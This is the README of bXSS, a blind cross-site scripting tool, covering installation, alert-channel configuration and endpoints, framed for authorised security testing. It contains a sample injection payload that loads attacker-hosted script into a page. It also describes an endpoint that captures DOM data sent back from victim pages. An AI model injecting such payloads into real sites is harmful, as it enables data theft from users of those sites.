bXSS is a Blind XSS application adapted from https://cure53.de/m
Switch branches/tags
Clone or download
Latest commit bf2fe68 Dec 10, 2018



bXSS is a Blind XSS application adapted from https://cure53.de/m, you can read about it here.

Gif of BlindXSS

bXSS supports the following:




  • cd bXSS && npm install
  • Update The Configuration || Environment Variables
    • Domain
      • config.url = Domain intended for use e.g ardern.io
      • config.port = Port to run the Node.js app e.g 3030
    • Twilio (Optional, if you don't want to use Twilio just delete all Twilio references from the config)
    • Slack (Optional, if you don't want to use Slack just delete all Slack references from the config)
    • Cisco (Optional, if you don't want to use Cisco just delete all Cisco references from the config)
    • Discord (Optional, if you don't want to use Discord just delete all Discord references from the config)
    • Gmail (Optional, if you don't want to use Gmail just delete all Gmail references from the config)
      • config.gmail.user = Gmail Username
      • config.gmail.pass = Gmail Password
      • config.gmail.to = ['email1@domain.com','email2@domain.com'] Where you want to send the emails
      • config.gmail.from = Who sent the message, usually Gmail Username
    • Rename configExample.js to config.js
  • Start your app (depending on your preference)
    • node app.js
    • pm2 start app.js
    • nodemon app.js

Additional Steps (Optional)

  • Obtain a let's Encrypt cert
  • I would recommend looking at setting up a reverse proxy, for example in NGINX and skip the next step as I wouldn't want anyone to run express as root.
  • Using Node.js
    • Update Configuration
      • config.letsEncrypt.TLS = true;
      • config.letsEncrypt.publicKey = $Path/fullchain.pem
      • config.letsEncrypt.privateKey = $Path/privkey.pem
      • config.letsEncrypt.ca = $Path/chain.pem
  • Start your app (depending on your preference)
    • node app.js
    • npm2 start app.js
    • nodemon app.js


Once the application is funcitonal, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:

"><script src="https://example.com/m"></script>

The application has three core functions

  • POST - /m (captures DOM information)
  • GET - /m (Loads the payload)
  • Payloads - /payloads (Gives payloads you can use for testing blind xss)
  • Everything else - Loads alert(1)


If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.